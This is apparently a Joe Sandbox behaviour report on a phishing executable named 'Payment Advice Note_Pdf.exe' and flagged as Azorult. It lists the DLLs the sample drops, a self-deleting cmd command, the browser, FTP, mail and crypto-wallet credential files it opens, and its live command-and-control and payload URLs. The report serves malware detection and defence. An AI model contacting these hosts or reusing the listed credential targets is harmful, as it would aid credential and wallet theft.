Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-string-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nssdbm3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-multibyte-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-math-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-private-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nseEFF9.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_00406362 FindFirstFileW,FindClose,	0_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 0_2_004027FB FindFirstFileW,	0_2_004027FB
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_00406362 FindFirstFileW,FindClose,	2_2_00406362
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_00405810 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	2_2_00405810
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Code function: 2_2_004027FB FindFirstFileW,	2_2_004027FB

Source: Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005380000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	API call chain: ExitProcess graph end node			graph_0-4449
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	API call chain: ExitProcess graph end node			graph_0-4454

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_00403868 GetTempPathW,LdrInitializeThunk,lstrcatW,lstrlenW,lstrcmpiW,GetFileAttributesW,LoadImageW,RegisterClassW,SystemParametersInfoW,CreateWindowExW,ShowWindow,GetClassInfoW,GetClassInfoW,GetClassInfoW,RegisterClassW,DialogBoxParamW,

0_2_00403868

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_10001B18 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_10001B18

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe "C:\Users\user\Desktop\Payment Advice Note_Pdf.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\system32\timeout.exe 3 & del "Payment Advice Note_Pdf.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe C:\Windows\system32\timeout.exe 3	Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Code function: 0_2_00406041 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406041

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected Azorult

Source: Yara match	File source: 00000002.00000002.1404635132.0000000000060000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1429245765.0000000036590000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \Electrum-LTCMv
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Electrum\wallets\\ectrum.dattubsystem\Profiles\Outlooka
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storage\\
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NC:\Users\user\AppData\Roaming\Exodus\\keystore\\\.dll
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Jaxx\Local Storage\\
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\ts\U
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus Eden\*t
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: dC:\Users\user\AppData\Roaming\Ethereum\keystore\ts\U
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: NC:\Users\user\AppData\Roaming\Exodus\\keystore\\\.dll
Source: Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: >%appdata%\Electrum-LTC\wallets\Electrum\wallets\tlooka\\ZxcvbnData\Login Datajsondll

Tries to harvest and steal Bitcoin Wallet information

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Key opened: HKEY_CURRENT_USER\Software\monero-project\monero-core			Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	Key opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-Qt			Jump to behavior

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\Sessions\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

File opened: C:\Users\user\AppData\Roaming\filezilla\recentservers.xml

Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\ElectrumG\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Electrum-btcp\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Exodus Eden\	Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\Jaxx\Local Storage\	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior
Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml			Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\Payment Advice Note_Pdf.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook

Jump to behavior

Source: Yara match	File source: 2.2.Payment Advice Note_Pdf.exe.3614d44f.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payment Advice Note_Pdf.exe.3614457d.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Payment Advice Note_Pdf.exe.36148ce7.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1353774402.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.1428296777.0000000036140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Payment Advice Note_Pdf.exe PID: 7280, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	1 DLL Side-Loading	1 Deobfuscate/Decode Files or Information	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 Windows Service	1 Access Token Manipulation	2 Obfuscated Files or Information	2 Credentials in Registry	125 System Information Discovery	Remote Desktop Protocol	4 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Windows Service	1 Timestomp	1 Credentials In Files	111 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	11 Process Injection	1 DLL Side-Loading	NTDS	1 Virtualization/Sandbox Evasion	Distributed Component Object Model	1 Clipboard Data	14 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 File Deletion	LSA Secrets	Internet Connection Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Payment Advice Note_Pdf.exe	8%	ReversingLabs
Payment Advice Note_Pdf.exe	14%	Virustotal		Browse

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-console-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-datetime-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-debug-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-errorhandling-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l1-2-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-file-l2-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-handle-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-heap-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-interlocked-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-libraryloader-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-localization-l1-2-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-memory-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-namedpipe-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processenvironment-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-processthreads-l1-1-1.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-profile-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-rtlsupport-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-string-l1-1-0.dll	0%	Virustotal	Browse
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\DFE8CB31\api-ms-win-core-synch-l1-1-0.dll	0%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
d4hk.shop	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Link
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal	Browse
http://d4hk.shop/MI341/index.php	12%	Virustotal	Browse
http://d4hk.shop/	2%	Virustotal	Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
d4hk.shop	172.67.215.93	true	true	2%, Virustotal, Browse	unknown
uktnl.vantechdns.com	172.93.121.126	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://d4hk.shop/MI341/index.php	true	12%, Virustotal, Browse	unknown
https://uktnl.vantechdns.com/Hpgcc91.bin	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.quovadis.bm0	Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://d4hk.shop/MI341/index.phpA	Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://uktnl.vantechdns.com/	Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://nsis.sf.net/NSIS_ErrorError	Payment Advice Note_Pdf.exe, 00000000.00000000.884748585.0000000000409000.00000008.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000000.00000002.1303900007.0000000000409000.00000004.00000001.01000000.00000003.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000002.1404823283.0000000000409000.00000008.00000001.01000000.00000003.sdmp	false	0%, Virustotal, Browse	unknown
https://ocsp.quovadisoffshore.com0	Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1302659425.00000000053CC000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://d4hk.shop/	Payment Advice Note_Pdf.exe, 00000002.00000003.1352474225.00000000053C7000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354418471.00000000053C6000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1353565469.00000000053C5000.00000004.00000020.00020000.00000000.sdmp, Payment Advice Note_Pdf.exe, 00000002.00000003.1354012860.00000000053C7000.00000004.00000020.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
https://uktnl.vantechdns.com/d4	Payment Advice Note_Pdf.exe, 00000002.00000002.1416658154.0000000005358000.00000004.00000020.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
172.67.215.93	d4hk.shop	United States		13335	CLOUDFLARENETUS	true
172.93.121.126	uktnl.vantechdns.com	United States		393960	HOST4GEEKS-LLCUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1522667
Start date and time:	2024-09-30 15:07:03 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 7s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 128, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	Payment Advice Note_Pdf.exe
Detection:	MAL
Classification:	mal100.phis.troj.spyw.evad.winEXE@8/56@3/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 89% Number of executed functions: 51 Number of non-executed functions: 75
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com, c.pki.goog
Execution Graph export aborted for target Payment Advice Note_Pdf.exe, PID 7280 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
d4hk.shop	Opgaveforlb.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3
d4hk.shop	Fordybendes.exe	Get hash	malicious	Azorult, GuLoader	Browse	188.114.96.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	3140, EUR.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	factura proforma .docx.doc	Get hash	malicious	Remcos	Browse	172.67.216.244
	http://email.app.loyalty.appstle.com/c/eJwczE2uLBEUAODVMHty6vgfGLxJ7YNCldsaadKJ3d_kbuCLDpJVWtPkDo1aHlqApo_j-QrGx0NGE5VRkkMwCbUEaa334GlxCCjAogErldDsyjIGyVXM-UCInAjwY7Dat69rMz_GXDWxq79pdc9aYxL-n-BJ8KylvUpjoXSC5_2T2iwlljsRPOnHhc--S1VIBHzvyVp-sdbpchGMyvkfJvbe8-mj5P2nfx3-BgAA__-UbkEq	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://www.google.com.ai/amp/clck.ru/3DSSCz?hghghghHGVGvbbgffGFHGJdgddghfhghfgdgdgdgfhgg?sdfsewsrewrettfg	Get hash	malicious	GRQ Scam	Browse	104.21.27.6
	https://techservealliance.org	Get hash	malicious	Unknown	Browse	104.18.142.119
	SCAN_Client_No_XP9739270128398468932393.pdf	Get hash	malicious	HTMLPhisher	Browse	104.21.90.191
	https://cganet.com/	Get hash	malicious	Unknown	Browse	104.22.0.204
	https://ck.storematch.jp/bc?d=11044D9580EY4W1C2FD019VB3VD27BCW862C0351F9E0EA8-cdlaq4&B=a4f71fd1c235a114f94297e8a0a36c6e&sc_i=shp_pc_promo_mdRMBP_disp_mcad&rd=//interglobalcargoexpress.com/yuuuii#aW5mb0B2b3NzbG9oLmNvbQ==	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
